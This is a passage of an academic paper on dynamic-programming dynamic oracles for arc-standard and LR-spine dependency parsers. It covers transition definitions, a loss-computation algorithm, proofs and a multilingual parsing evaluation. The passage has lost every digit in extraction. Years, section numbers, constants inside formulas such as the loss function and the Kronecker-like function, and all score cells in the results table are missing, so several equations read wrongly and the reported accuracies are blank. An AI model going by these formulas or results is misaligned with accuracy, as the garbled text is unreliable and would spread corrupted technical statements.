linguistics. benefit of training with the dynamic oracle carry over to the arc-standard and lr-spine systems? we show experimentally that this is indeed the case (§ ), and that using the training-with-exploration method of (goldberg and nivre, ) with our dynamic programming based oracles yields superior parsing accuracies on many languages. arc-standard parser in this section we introduce the arc-standard parser of nivre ( ), which is the model that we use in this article. to keep the notation at a simple level, we only discuss the unlabeled version of the parser; however, a labeled extension is used in § for our experiments. . preliminaries and notation the set of non-negative integers is denoted as n . for i,j ∈ n with i ≤ j, we write [i,j] to denote the set {i, i + , . . . ,j}. when i > j, [i,j] denotes the empty set. we represent an input sentence as a string w = w · · ·wn, n ∈ n , where token w is a special root symbol, and each wi with i ∈ [ ,n] is a lex- ical token. for i,j ∈ [ ,n] with i ≤ j, we write w[i,j] to denote the substring wiwi+ · · ·wj of w. we write i → j to denote a grammatical de- pendency of some unspecified type between lexical tokens wi and wj, where wi is the head and wj is the dependent. a dependency tree for w is a directed, ordered tree t = (vw,a), such that vw = [ ,n] is the set of nodes, a ⊆ vw×vw is the set of arcs, and node is the root. arc (i,j) encodes a dependency i → j, and we will often use the latter notation to denote arcs. . transition-based dependency parsing we assume the reader is familiar with the formal framework of transition-based dependency parsing originally introduced by nivre ( ); see nivre ( ) for an introduction. we only summarize here our notation. transition-based dependency parsers use a stack data structure, where each stack element is associ- ated with a tree spanning (generating) some sub- string of the input w. the parser processes the in- put string incrementally, from left to right, applying at each step a transition that updates the stack and/or consumes one token from the input. transitions may also construct new dependencies, which are added to the current configuration of the parser. we represent the stack data structure as an ordered sequence σ = [σd, . . . ,σ ], d ∈ n , of nodes σi ∈ vw, with the topmost element placed at the right. when d = , we have the empty stack σ = []. sometimes we use the vertical bar to denote the append operator for σ, and write σ = σ′|σ to indicate that σ is the topmost element of σ. the parser also uses a buffer to store the portion of the input string still to be processed. we represent the buffer as an ordered sequence β = [i, . . . ,n] of nodes from vw, with i the first element of the buf- fer. in this way β always encodes a (non-necessarily proper) suffix of w. we denote the empty buffer as β = []. sometimes we use the vertical bar to denote the append operator for β, and write β = i|β′ to in- dicate that i is the first token of β; consequently, we have β′ = [i + , . . . ,n]. when processing w, the parser reaches several states, technically called configurations. a config- uration of the parser relative to w is a triple c = (σ,β,a), where σ and β are a stack and a buffer, respectively, and a ⊆ vw ×vw is a set of arcs. the initial configuration for w is ([], [ , . . . ,n],∅). for the purpose of this article, a configuration is final if it has the form ([ ], [],a), and in a final config- uration arc set a always defines a dependency tree for w. the core of a transition-based parser is the set of its transitions, which are specific to each family of parsers. a transition is a binary relation defined over the set of configurations of the parser. we use symbol ` to denote the union of all transition rela- tions of a parser. a computation of the parser on w is a sequence c , . . . ,cm, m ∈ n , of configurations (defined rel- ative to w) such that ci− ` ci for each i ∈ [ ,m]. we also use the reflexive and transitive closure rela- tion `∗ to represent computations. a computation is called complete whenever c is initial and cm is fi- nal. in this way, a complete computation is uniquely associated with a dependency tree for w. . arc-standard parser the arc-standard model uses the three types of trans- itions formally specified in figure (σ,i|β,a) `sh (σ|i,β,a) (σ|i|j,β,a) `la (σ|j,β,a∪{j → i}) (σ|i|j,β,a) `ra (σ|i,β,a∪{i → j}) figure : transitions in the arc-standard model. • shift (sh) removes the first node in the buffer and pushes it into the stack; • left-arc (la) creates a new arc with the topmost node on the stack as the head and the second- topmost node as the dependent, and removes the second-topmost node from the stack; • right-arc (ra) is symmetric to la in that it cre- ates an arc with the second-topmost node as the head and the topmost node as the dependent, and removes the topmost node. notation we sometimes use the functional nota- tion for a transition τ ∈ {sh, la,ra}, and write τ(c) = c′ in place of c `τ c′. naturally, sh applies only when the buffer is not empty, and la,ra require two elements on the stack. we denote by valid(c) the set of valid transitions in a given configuration. . arc decomposition goldberg and nivre ( ) show how to derive dy- namic oracles for any transition-based parser which has the arc decomposition property, defined below. they also show that the arc-standard parser is not arc-decomposable. for a configuration c, we write ac to denote the associated set of arcs. a transition-based parser is arc-decomposable if, for every configuration c and for every set of arcs a that can be extended to a pro- jective tree, we have ∀(i → j) ∈ a,∃c′[c `∗ c′ ∧ (i → j) ∈ ac′ ] ⇒∃c′′[c `∗ c′′ ∧a ⊆ ac′′ ] . in words, if each arc in a is individually derivable from c, then the set a in its entirety can be derived from c as well. the arc decomposition property is useful for deriving dynamic oracles because it is relatively easy to investigate derivability for single arcs and then, using this property, draw conclusions about the number of gold-arcs that are simultan- eously derivable from the given configuration. unfortunately, the arc-standard parser is not arc- decomposable. to see why, consider a configura- tion with stack σ = [i,j,k]. consider also arc set a = {(i,j), (i,k)}. the arc (i,j) can be derived through the transition sequence ra, ra, and the arc (i,k) can be derived through the alternative trans- ition sequence la, ra. yet, it is easy to see that a con- figuration containing both arcs cannot be reached. as we cannot rely on the arc decomposition prop- erty, in order to derive a dynamic oracle for the arc- standard model we need to develop more sophistic- ated techniques which take into account the interac- tion among the applied transitions. configuration loss and dynamic oracles we aim to derive a dynamic oracle for the arc-stand- ard (and related) system. this is a function that takes a configuration c and a gold tree tg and returns a set of transitions that are “optimal” for c with respect to tg. as already mentioned in the introduction, a dynamic oracle can be used to improve training of greedy transition-based parsers. in this section we provide a formal definition for a dynamic oracle. let t and t be two dependency trees over the same string w, with arc sets a and a , respectively. we define the loss of t with respect to t as l(t , t ) = |a \a | . ( ) note that l(t , t ) = l(t , t ), since |a | = |a |. furthermore l(t , t ) = if and only if t and t are the same tree. let c be a configuration of our parser relative to input string w. we write d(c) to denote the set of all dependency trees that can be obtained in a com- putation of the form c `∗ cf , where cf is some final configuration. we extend the loss function in ( ) to configurations by letting l(c,t ) = min t ∈d(c) l(t , t ) . ( ) assume some reference (desired) dependency tree tg for w, which we call the gold tree. quantity l(c,tg) can be used to compute a dynamic oracle relating a parser configuration c to a set of optimal actions by setting oracle(c,tg) = {τ | l(τ(c), tg) −l(c,tg) = } . ( ) we therefore need to develop an algorithm for com- puting ( ). we will do this first for the arc-standard parser, and then for an extension of this model. notation we also apply the loss function l(t,tg) in ( ) when t is a dependency tree for a substring of w. in this case the nodes of t are a subset of the nodes of tg, and l(t,tg) provides a count of the nodes of t that are assigned a wrong head node, when tg is considered as the reference tree. main algorithm throughout this section we assume an arc-standard parser. our algorithm takes as input a projective gold tree tg and a configuration c = (σl,β,a). we call σl the left stack, in contrast with a right stack whose construction is specified below. . basic idea the algorithm consists of two steps. informally, in the first step we compute the largest subtrees, called here tree fragments, of the gold tree tg that have their span entirely included in the buffer β. the root nodes of these tree fragments are then arranged into a stack data structure, according to the order in which they appear in β and with the leftmost root in β being the topmost element of the stack. we call this structure the right stack σr. intuitively, σr can be viewed as the result of pre-computing β by ap- plying all sequences of transitions that match tg and that can be performed independently of the stack in the input configuration c, that is, σl. in the second step of the algorithm we use dy- namic programming techniques to simulate all com- putations of the arc-standard parser starting in a con- figuration with stack σl and with a buffer consisting of σr, with the topmost token of σr being the first token of the buffer. as we will see later, the search space defined by these computations includes the de- pendency trees for w that are reachable from the in- put configuration c and that have minimum loss. we then perform a viterbi search to pick up such value. the second step is very similar to standard imple- mentations of the cky parser for context-free gram- mars (hopcroft and ullman, ), running on an input string obtained as the concatenation of σl and σr. the main difference is that we restrict ourselves to parse only those constituents in σlσr that dom- inate the topmost element of σl (the rightmost ele- ment, if σl is viewed as a string). in this way, we ac- count for the additional constraint that we visit only those configurations of the arc-standard parser that can be reached from the input configuration c. for instance, this excludes the reduction of two nodes in σl that are not at the two topmost positions. this would also exclude the reduction of two nodes in σr: this is correct, since the associated tree frag- ments have been chosen as the largest such frag- ments in β. the above intuitive explanation will be made mathematically precise in § , where the notion of linear dependency tree is introduced. . construction of the right stack in the first step we process β and construct a stack σr, which we call the right stack associated with c and tg. each node of σr is the root of a tree t which satisfies the following properties • t is a tree fragment of the gold tree tg having span entirely included in the buffer β; • t is bottom-up complete for tg, meaning that for each node i of t different from t’s root, the dependents of i in tg cannot be in σl; • t is maximal for tg, meaning that every super- tree of t in tg violates the above conditions. the stack σr is incrementally constructed by pro- cessig β from left to right. each node i is copied into σr if it satisfies any of the following conditions • the parent node of i in tg is not in β; • some dependent of i in tg is in σl or has already been inserted in σr. it is not difficult to see that the nodes in σr are the roots of tree fragments of tg that satisfy the condi- tion of bottom-up completeness and the condition of maximality defined above. . computation of configuration loss we start with some notation. let `l = |σl| and `r = |σr|. we write σl[i] to denote the i-th ele- ment of σl and t(σl[i]) to denote the correspond- ing tree fragment; σr[i] and t(σr[i]) have a similar meaning. in order to simplify the specification of the algorithm, we assume below that σl[ ] = σr[ ]. algorithm computation of the loss function for the arc-standard parser : t [ , ](σl[ ]) ←l(t(σl[ ]), tg) : for d ← to `l + `r − do . d is the index of a sub-anti-diagonal : for j ← max{ ,d− `l + } to min{d,`r} do . j is the column index : i ← d− j + . i is the row index : if i < `l then . expand to the left : for each h ∈ ∆i,j do : t [i + ,j](h) ← min{t [i + ,j](h), t [i,j](h) + δg(h → σl[i + ])} : t [i + ,j](σl[i + ]) ← min{t [i + ,j](σl[i + ]), t [i,j](h) + δg(σl[i + ] → h)} : if j < `r then . expand to the right : for each h ∈ ∆i,j do : t [i,j + ](h) ← min{t [i,j + ](h), t [i,j](h) + δg(h → σr[j + ])} : t [i,j + ](σr[j + ]) ← min{t [i,j + ](σr[j + ]),t [i,j](h) +δg(σr[j + ] → h)} : return t [`l,`r]( ) + ∑ i∈[ ,`l] l(t(σl[i]), tg) therefore the elements of σr which have been con- structed in § . are σr[i], i ∈ [ ,`r]. algorithm uses a two-dimensional array t of size `l × `r, where each entry t [i,j] is an as- sociation list from integers to integers. an entry t [i,j](h) stores the minimum loss among depend- ency trees rooted at h that can be obtained by run- ning the parser on the first i elements of stack σl and the first j elements of buffer σr. more precisely, let ∆i,j = {σl[k] | k ∈ [ , i]}∪ {σr[k] | k ∈ [ ,j]} . ( ) for each h ∈ ∆i,j, the entry t [i,j](h) is the minimum loss among all dependency trees defined as above and with root h. we also assume that t [i,j](h) is initialized to +∞ (not reported in the algorithm). algorithm starts at the top-left corner of t , vis- iting each individual sub-anti-diagonal of t in as- cending order, and eventually reaching the bottom- right corner of the array. for each entry t [i,j], the left expansion is considered (lines to ) by com- bining with tree fragment σl[i + ], through a left or a right arc reduction. this results in the update of t [i + ,j](h), for each h ∈ ∆i+ ,j, whenever a smaller value of the loss is achieved for a tree with root h. the kronecker-like function used at line provides the contribution of each single arc to the loss of the current tree. denoting with ag the set of arcs of tg, such a function is defined as δg(i → j) = { , if (i → j) ∈ ag; , otherwise. ( ) a symmetrical process is implemented for the right expansion of t [i,j] through tree fragment σr[j + ] (lines to ). as we will see in the next section, quantity t [`l,`r]( ) is the minimal loss of a tree composed only by arcs that connect nodes in σl and σr. by summing the loss of all tree fragments t(σl[i]) to the loss in t [`l,`r]( ), at line , we obtain the desired result, since the loss of each tree fragment t(σr[j]) is zero. formal properties throughout this section we let w, tg, σl, σr and c = (σl,β,a) be defined as in § , but we no longer assume that σl[ ] = σr[ ]. to simplify the present- ation, we sometimes identify the tokens in w with the associated nodes in a dependency tree for w. . linear trees algorithm explores all dependency trees that can be reached by an arc-standard parser from configur- ation c, under the condition that (i) the nodes in the buffer β are pre-computed into tree fragments and collapsed into their root nodes in the right stack σr, and (ii) nodes in σr cannot be combined together prior to their combination with other nodes in the left stack σl. this set of dependency trees is char- j i i i j i i j i j j σrσl figure : a possible linear tree for string pair (σl,σr), where σl = i i i i i i and σr = j j j j j . the spine of the tree consists of nodes j , i and i . acterized here using the notion of linear tree, to be used later in the correctness proof. consider two nodes σl[i] and σl[j] with j > i > . an arc-standard parser can construct an arc between σl[i] and σl[j], in any direction, only after reaching a configuration in which σl[i] is at the top of the stack and σl[j] is at the second topmost posi- tion. in such configuration we have that σl[i] dom- inates σl[ ]. furthermore, consider nodes σr[i] and σr[j] with j > i ≥ . since we are assuming that tree fragments t(σr[i]) and t(σr[j]) are bottom-up complete and maximal, as defined in § . , we allow the construction of an arc between σr[i] and σr[j], in any direction, only after reaching a configuration in which σr[i] dominates node σl[ ]. the dependency trees satisfying the restrictions above are captured by the following definition. a linear tree over (σl,σr) is a projective dependency tree t for string σlσr satisfying both of the addi- tional conditions reported below. the path from t’s root to node σl[ ] is called the spine of t. • every node of t not in the spine is a dependent of some node in the spine. • for each arc i → j in t with j in the spine, no dependent of i can be placed in between i and j within string σlσr. an example of a linear tree is depicted in figure . observe that the second condition above forbids the reduction of two nodes i and j, in case none of these dominates node σl[ ]. for instance, the ra reduc- tion of nodes i and i would result in arc i → i replacing arc i → i in figure . the new depend- ency tree is not linear, because of a violation of the second condition above. similarly, the la reduction of nodes j and j would result in arc j → j re- placing arc i → j in figure , again a violation of the second condition above. lemma any tree t ∈ d(c) can be decomposed into trees t(σl[i]), i ∈ [ ,`l], trees tj, j ∈ [ ,q] and q ≥ , and a linear tree tl over (σl,σr,t), where σr,t = r · · ·rq and each rj is the root node of tj. proof (sketch) trees t(σl[i]) are common to every tree in d(c), since the arc-standard model can not undo the arcs already built in the current con- figuration c. similar to the construction in § . of the right stack σr from tg, we let tj, j ∈ [ ,q], be tree fragments of t that cover only nodes associated with the tokens in the buffer β and that are bottom- up complete and maximal for t. these trees are in- dexed according to their left to right order in β. fi- nally, tl is implicitly defined by all arcs of t that are not in trees t(σl[i]) and tj. it is not difficult to see that tl has a spine ending with node σl[ ] and is a linear tree over (σl,σr,t). � . correctness our proof of correctness for algorithm is based on a specific dependency tree t∗ for w, which we define below. let sl = {σl[i] | i ∈ [ ,`l]} and let dl be the set of nodes that are descendants of some node in sl. similarly, let sr = {σr[i] | i ∈ [ ,`r]} and let dr be the set of descendants of nodes in sr. note that sets sl,sr,dl and dr provide a partition of vw. we choose any linear tree t∗l over (σl,σr) having root , such that l(t∗l , tg) = mintl(t,tg), where t ranges over all possible linear trees over (σl,σr) with root . tree t∗ consists of the set of nodes vw and the set of arcs obtained as the union of the set of arcs of t∗l and the set of arcs of all trees t(σl[i]), i ∈ [ ,`l], and t(σr[j]), j ∈ [ ,`r]. lemma t∗ ∈d(c). proof (sketch) all tree fragments t(σl[i]) have already been parsed and are available in the stack associated with c. each tree fragment t(σr[j]) can later be constructed in the computation, when a con- figuration c′ is reached with the relevant segment of w at the start of the buffer. note also that parsing of t(σr[j]) can be done in a way that does not depend on the content of the stack in c′. finally, the parsing of the tree fragments t(σr[j]) is interleaved with the construction of the arcs from the linear tree t∗l , which are all of the form (i → j) with i,j ∈ (sl ∪ sr). more precisely, if (i → j) is an arc from t∗l , at some point in the computation nodes i and j will become available at the two top- most positions in the stack. this follows from the second condition in the definition of linear tree. � we now show that tree t∗ is “optimal” within the set d(c) and with respect to tg. lemma l(t∗, tg) = l(c,tg). proof consider an arbitrary tree t ∈ d(c). as- sume the decomposition of t defined in the proof of lemma , through trees t(σl[i]), i ∈ [ ,`l], trees tj, j ∈ [ ,q], and linear tree tl over (σl,σr,t). recall that an arc i → j denotes an ordered pair (i,j). let us consider the following partition for the set of arcs of any dependency tree for w a = (sl ∪dl) ×dl , a = (sr ∪dr) ×dr , a = (vw ×vw) \ (a ∪a ) . in what follows, we compare the losses l(t,tg) and l(t∗, tg) by separately looking into the contribution to such quantities due to the arcs in a , a and a . note that the arcs of trees t(σl[i]) are all in a , the arcs of trees t(σr[j]) are all in a , and the arcs of tree t∗l are all in a . since t and t ∗ share trees t(σl[i]), when restricted to arcs in a quantities l(t,tg) and l(t∗, tg) are the same. when restric- ted to arcs in a , quantity l(t∗, tg) is zero, by con- struction of the trees t(σr[j]). thus l(t,tg) can not be smaller than l(t∗, tg) for these arcs. the difficult part is the comparison of the contribution to l(t,tg) and l(t∗, tg) due to the arcs in a . we deal with this below. let as,g be the set of all arcs from tg that are also in set (sl ×sr) ∪ (sr ×sl). in words, as,g rep- resents gold arcs connecting nodes in sl and nodes in sr, in any direction. within tree t, these arcs can only be found in the tl component, since nodes in sl are all placed within the spine of tl, or else at the left of that spine. let us consider an arc (j → i) ∈ as,g with j ∈ sl and i ∈ sr, and let us assume that (j → i) is in t∗l . if token ai does not occur in σr,t, node i is not in tl and (j → i) can not be an arc of t. we then have that (j → i) contributes one unit to l(t,tg) but does not contribute to l(t∗, tg). similarly, let (i → j) ∈ as,g be such that i ∈ sr and j ∈ sl, and assume that (i → j) is in t∗l . if token ai does not occur in σr,t, arc (i → j) can not be in t. we then have that (i → j) contributes one unit to l(t,tg) but does not contribute to l(t∗, tg). intuitively, the above observations mean that the winning strategy for trees in d(c) is to move nodes from sr as much as possible into the linear tree component tl, in order to make it possible for these nodes to connect to nodes in sl, in any direction. in this case, arcs from a will also move into the linear tree component of a tree in d(c), as it happens in the case of t∗. we thus conclude that, when restricted to the set of arcs in a , quantity l(t,tg) is not smal- ler than l(t∗, tg), because stack σr has at least as many tokens corresponding to nodes in sr as stack σr,t, and because t∗l has the minimum loss among all the linear trees over (σl,σr). putting all of the above observations together, we conclude that l(t,tg) can not be smaller than l(t∗, tg). this concludes the proof, since t has been arbitrarily chosen in d(c). � theorem algorithm computes l(c,tg). proof (sketch) algorithm implements a vi- terbi search for trees with smallest loss among all linear trees over (σl,σr). thus t [`l,`r]( ) = l(t∗l , tg). the loss of the tree fragments t(σr[j]) is and the loss of the tree fragments t(σl[i]) is ad- ded at line in the algorithm. thus the algorithm returns l(t∗, tg), and the statement follows from lemma and lemma . � . computational analysis following § . , the right stack σr can be easily constructed in time o(n), n the length of the in- put string. we now analyze algorithm . for each entry t [i,j] and for each h ∈ ∆i,j, we update t [i,j](h) a number of times bounded by a con- stant which does not depend on the input. each up- dating can be computed in constant time as well. we thus conclude that algorithm runs in time o(`l · `r · (`l + `r)). quantity `l+`r is bounded by n, but in practice the former is significantly smal- ler. when measured over the sentences in the penn treebank, the average value of `l+`r n is . . in terms of runtime, training is . times slower when using our oracle instead of a static oracle. extension to the lr-spine parser in this section we consider the transition-based parser proposed by sartorio et al. ( ), called here the lr-spine parser. this parser is not arc- decomposable: the same example reported in § . can be used to show this fact. we therefore extend to the lr-spine parser the algorithm developed in § . . the lr-spine parser let t be a dependency tree. the left spine of t is an ordered sequence 〈i , . . . , ip〉, p ≥ , consisting of all nodes in a descending path from the root of t taking the leftmost child node at each step. the right spine of t is defined symmetrically. we use ⊕ to denote sequence concatenation. in the lr-spine parser each stack element σ[i] de- notes a partially built subtree t(σ[i]) and is represen- ted by a pair (lsi, rsi), with lsi and rsi the left and the right spine, respectively, of t(σ[i]). we write lsi[k] (rsi[k]) to represent the k-th element of lsi (rsi, re- spectively). we also write r(σ[i]) to denote the root of t(σ[i]), so that r(σ[i]) = lsi[ ] = rsi[ ]. informally, the lr-spine parser uses the same transition typologies as the arc-standard parser. however, an arc (h → d) can now be created with the head node h chosen from any node in the spine of the involved tree. the transition types of the lr- spine parser are defined as follows. • shift (sh) removes the first node from the buf- fer and pushes into the stack a new element, consisting of the left and right spines of the as- sociated tree (σ,i|β,a) `sh (σ|(〈i〉,〈i〉),β,a) . • left-arc k (lak) creates a new arc h → d from the k-th node in the left spine of the topmost tree in the stack to the head of the second ele- ment in the stack. furthermore, the two top- most stack elements are replaced by a new ele- ment associated with the resulting tree (σ′|σ[ ]|σ[ ],β,a) `lak (σ ′|σlak,β,a∪{h → d}) where we have set h = ls [k], d = r(σ[ ]) and σlak = (〈ls [ ], . . . , ls [k]〉⊕ ls , rs ). • right-arc k (rak for short) is defined symmet- rically with respect to lak (σ′|σ[ ]|σ[ ],β,a) `rak (σ′|σrak,β,a∪{h → d}) where we have set h = rs [k], d = r(σ[ ]) and σrak = (ls ,〈rs [ ], . . . , rs [k]〉⊕ rs ). note that, at each configuration in the lr-spine parser, there are |ls | possible lak transitions, one for each choice of a node in the left spine of t(σ[ ]); similarly, there are |rs | possible rak transitions, one for each choice of a node in the right spine of t(σ[ ]). . configuration loss we only provide an informal description of the ex- tended algorithm here, since it is very similar to the algorithm in § . in the first phase we use the procedure of § . for the construction of the right stack σr, considering only the roots of elements in σl and ignoring the rest of the spines. the only difference is that each element σr[j] is now a pair of spines (lsr,j, rsr,j). since tree fragment t(σr[j]) is bottom-up complete (see § . ), we now restrict the search space in such a way that only the root node r(σr[j]) can take de- pendents. this is done by setting lsr,j = rsr,j = 〈r(σr[j])〉 for each j ∈ [ ,`r]. in order to simplify the presentation we also assume σr[ ] = σl[ ], as done in § . . in the second phase we compute the loss of an in- put configuration using a two-dimensional array t , defined as in § . . however, because of the way transitions are defined in the lr-spine parser, we now need to distinguish tree fragments not only on the basis of their roots, but also on the basis of their left and right spines. accordingly, we define each entry t [i,j] as an association list with keys of the form (ls, rs). more specifically, t [i,j](ls, rs) is the minimum loss of a tree with left and right spines ls and rs, respectively, that can be obtained by running the parser on the first i elements of stack σl and the first j elements of buffer σr. we follow the main idea of algorithm and ex- pand each tree in t [i,j] at its left side, by combin- ing with tree fragment t(σl[i + ]), and at its right side, by combining with tree fragment t(σr[j + ]). tree combination deserves some more detailed dis- cussion, reported below. we consider the combination of a tree ta from t [i,j] and tree t(σl[i + ]) by means of a left-arc transition. all other cases are treated symmetric- ally. let (lsa, rsa) be the spine pair of ta, so that the loss of ta is stored in t [i,j](lsa, rsa). let also (lsb, rsb) be the spine pair of t(σl[i + ]). in case there exists a gold arc in tg connecting a node from lsa to r(σl[i + ]), we choose the transition lak, k ∈ [ , |lsa|], that creates such arc. in case such gold arc does not exists, we choose the transition lak with the maximum possible value of k, that is, k = |lsa|. we therefore explore only one of the several pos- sible ways of combining these two trees by means of a left-arc transition. we remark that the above strategy is safe. in fact, in case the gold arc exists, no other gold arc can ever involve the nodes of lsa eliminated by lak (see the definition in § . ), because arcs can not cross each other. in case the gold arc does not exist, our choice of k = |lsa| guarantees that we do not eliminate any element from lsa. once a transition lak is chosen, as described above, the reduction is performed and the spine pair (ls, rs) for the resulting tree is computed from (lsa, rsa) and (lsb, rsb), as defined in § . . at the same time, the loss of the resulting tree is com- puted, on the basis of the loss t [i,j](lsa, rsa), the loss of tree t(σl[i + ]), and a kronecker-like func- tion defined below. this loss is then used to update t [i + ,j](ls, rs). let ta and tb be two trees that must be combined in such a way that tb becomes the dependent of some node in one of the two spines of ta. let also pa = (lsa, rsa) and pb = (lsb, rsb) be spine pairs for ta and tb, respectively. recall that ag is the set of arcs of tg. the new kronecker-like function for the computation of the loss is defined as δg(pa,pb) =    , if r(ta) < r(tb)∧ ∃k[(rska → r(tb)) ∈ ag]; , if r(ta) > r(tb)∧ ∃k[(lska → r(tb)) ∈ ag]; , otherwise. . efficiency improvement the algorithm in § . has an exponential behaviour. to see why, consider trees in t [i,j]. these trees are produced by the combination of trees in t [i− ,j] with tree t(σl[i]), or by the combination of trees in t [i,j − ] with tree t(σr[j]). since each combin- ation involves either a left-arc or a right-arc trans- ition, we obtain a recursive relation that resolves into a number of trees in t [i,j] bounded by i+j− . we introduce now two restrictions to the search space of our extended algorithm that result in a huge computational saving. for a spine s, we write n(s) to denote the set of all nodes in s. we also let ∆i,j be the set of all pairs (ls, rs) such that t [i,j](ls, rs) = +∞. • every time a new pair (ls, rs) is created in ∆[i,j], we remove from ls all nodes different from the root that do not have gold dependents in {r(σl[k]) | k < i}, and we remove from rs all nodes different from the root that do not have gold dependents in {r(σr[k]) | k > j}. • a pair pa = (lsa, rsa) is removed from ∆[i,j] if there exists a pair pb = (lsb, rsb) in ∆[i,j] with the same root node as pa and with (lsa, rsa) = (lsb, rsb), such that n(lsa) ⊆ n(lsb), n(rsa) ⊆ n(rsb), and t [i,j](pa) ≥ t [i,j](pb). the first restriction above reduces the size of a spine by eliminating a node if it is irrelevant for the com- putation of the loss of the associated tree. the second restriction eliminates a tree ta if there is a tree tb with smaller loss than ta, such that in the computations of the parser tb provides exactly the same context as ta. it is not difficult to see that the above restrictions do not affect the correctness of the algorithm, since they always leave in our search space some tree that has optimal loss. a mathematical analysis of the computational complexity of the extended algorithm is quite in- volved. in figure , we plot the worst case size of t [i,j] for each value of j + i − , computed over all configurations visited in the training phase (see § ). we see that |t [i,j]| grows linearly with j + i− , leading to the same space requirements of algorithm . empirically, training with the dynamic i + j − m ax nu m be r of el em en ts figure : empirical worst case size of t [i,j] for each value of i + j − as measured on the penn treebank corpus. algorithm online training for greedy transition- based parsers : w ← : for k iterations do : shuffle(corpus) : for sentence w and gold tree tg in corpus do : c ← initial(w) : while not final(c) do : τp ← argmaxτ∈valid(c) w ·φ(c,τ) : τo ← argmaxτ∈oracle(c,tg) w·φ(c,τ) : if τp ∈ oracle(c,tg) then : w ← w + φ(c,τo) −φ(c,τp) : τ ← { τp if explore τo otherwise : c ← τ(c) return averaged(w) oracle is only about times slower than training with the oracle of sartorio et al. ( ) without exploring incorrect configurations. training we follow the training procedure suggested by goldberg and nivre ( ), as described in al- gorithm . the algorithm performs online learning using the averaged perceptron algorithm. a weight vector w (initialized to ) is used to score the valid transitions in each configuration based on a feature representation φ, and the highest scoring transition τp is predicted. if the predicted transition is not optimal according to the oracle, the weights w are updated away from the predicted transition and to- wards the highest scoring oracle transition τo. the parser then moves to the next configuration, by tak- ing either the predicted or the oracle transition. in the “error exploration” mode (explore is true), the parser follows the predicted transition, and other- wise the parser follows the oracle transition. note that the error exploration mode requires the com- pleteness property of a dynamic oracle. we consider three training conditions: static, in which the oracle is deterministic (returning a single canonical transition for each configuration) and no error exploration is performed; nondet, in which we use a nondeterministic partial oracle (sartorio et al., ), but do not perform error exploration; and ex- plore in which we use the dynamic oracle and per- form error exploration. the static setup mirrors the way greedy parsers are traditionally trained. the nondet setup allows the training procedure to choose which transition to take in case of spurious ambigu- ities. the explore setup increases the configuration space explored by the parser during training, by ex- posing the training procedure to non-optimal con- figurations that are likely to occur during parsing, together with the optimal transitions to take in these configurations. it was shown by goldberg and nivre ( ; ) that the nondet setup outperforms the static setup, and that the explore setup outperforms the nondet setup. experimental evaluation datasets performance evaluation is carried out on conll multilingual dataset, as well as on the penn treebank (ptb) (marcus et al., ) conver- ted to stanford basic dependencies (de marneffe et al., ). for the conll datasets we use gold part-of-speech tags, while for the ptb we use auto- matically assigned tags. as usual, the ptb parser is trained on sections - and tested on section . setup we train labeled versions of the arc-stand- ard (std) and lr-spine (lrs) parsers under the static, nondet and explore setups, as defined in § . in the nondet setup we use a nondeterministic partial oracle and in the explore setup we use the non- deterministic complete oracles we present in this pa- per. in the static setup we resolve oracle ambiguities and choose a canonic transition sequence by attach- ing arcs as soon as possible. in the explore setup, parser:train arabic basque catalan chinese czech english greek hungarian italian turkish ptb uas std:static . . . . . . . . . . . std:nondet . . . . . . . . . . . std:explore . . . . . . . . . . . lrs:static . . . . . . . . . . . lrs:nondet . . . . . . . . . . . lrs:explore . . . . . . . . . . . las std:static . . . . . . . . . . . std:nondet . . . . . . . . . . . std:explore . . . . . . . . . . . lrs:static . . . . . . . . . . . lrs:nondet . . . . . . . . . . . lrs:explore . . . . . . . . . . . table : scores on the conll dataset (including punctuation, gold parts of speech) and on penn tree bank (excluding punctuation, predicted parts of speech). label ‘std’ refers to the arc-standard parser, and ‘lrs’ refers to the lr-spine parser. each number is an average over runs with different randomization seeds. from the first round of training onward, we always follow the predicted transition (explore is true). for all languages, we deal with non-projectivity by skipping the non-projective sentences during train- ing but not during test. for each parsing system, we use the same feature templates across all lan- guages. the arc-standard models are trained for iterations and the lr-spine models for iterations, after which all the models seem to have converged. results in table we report the labeled (las) and unlabeled (uas) attachment scores. as expec- ted, the lr-spine parsers outperform the arc-stand- ard parsers trained under the same setup. training with the dynamic oracles is also beneficial: despite the arguable complexity of our proposed oracles, the trends are consistent with those reported by gold- berg and nivre ( ; ). for the arc-standard model we observe that the move from a static to a nondeterministic oracle during training improves the accuracy for most of languages. making use of the completeness of the dynamic oracle and moving to the error exploring setup further improve results. the only exceptions are basque, that has a small dataset with more than % of non-projective sen- tences, and chinese. for chinese we observe a re- duction of accuracy in the nondet setup, but an in- crease in the explore setup. for the lr-spine parser we observe a practically constant increase of performance by moving from our complete code, together with the description of the fea- ture templates, is available on the second author’s homepage. the static to the nondeterministic and then to the er- ror exploring setups. conclusions we presented dynamic oracles, based on dynamic programming, for the arc-standard and the lr- spine parsers. empirical evaluation on languages showed that, despite the apparent complexity of the oracle calculation procedure, the oracles are still learnable, in the sense that using these oracles in the error exploration training algorithm presented in (goldberg and nivre, ) considerably improves the accuracy of the trained parsers. our algorithm computes a dynamic oracle using dynamic programming to explore a forest of depend- ency trees that can be reached from a given parser configuration. for the arc-standard parser, the com- putation takes cubic time in the size of the largest of the left and right input stacks. dynamic program- ming for the simulation of arc-standard parsers have been proposed by kuhlmann et al. ( ). that al- gorithm could be adapted to compute minimum loss for a given configuration, but the running time is o(n ), n the size of the input string: besides being asymptotically slower by one order of magnitude, in practice n is also larger than the stack size above. acknowledgments we wish to thank the anonym- ous reviewers. in particular, we are indebted to one of them for two important technical remarks. the third author has been partially supported by miur under project prin no. lya rh . references marie-catherine de marneffe, bill maccartney, and christopher d. manning. . generating typed de- pendency parses from phrase structure parses. in pro- ceedings of the th international conference on lan- guage resources and evaluation (lrec), volume , pages – . yoav goldberg and joakim nivre. . a dynamic or- acle for arc-eager dependency parsing. in proc. of the th coling, mumbai, india. yoav goldberg and joakim nivre. . training deterministic parsers with non-deterministic oracles. transactions of the association for computational linguistics, . john e. hopcroft and jeffrey d. ullman. . intro- duction to automata theory, languages and compu- tation. addison-wesley, reading, ma. liang huang and kenji sagae. . dynamic program- ming for linear-time incremental parsing. in proceed- ings of the th annual meeting of the association for computational linguistics, july. marco kuhlmann, carlos gómez-rodrı́guez, and gior- gio satta. . dynamic programming algorithms for transition-based dependency parsers. in proceed- ings of the th annual meeting of the association for computational linguistics: human language techno- logies, pages – , portland, oregon, usa, june. association for computational linguistics. mitchell p. marcus, beatrice santorini, and mary ann marcinkiewicz. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ): – . joakim nivre, johan hall, sandra kübler, 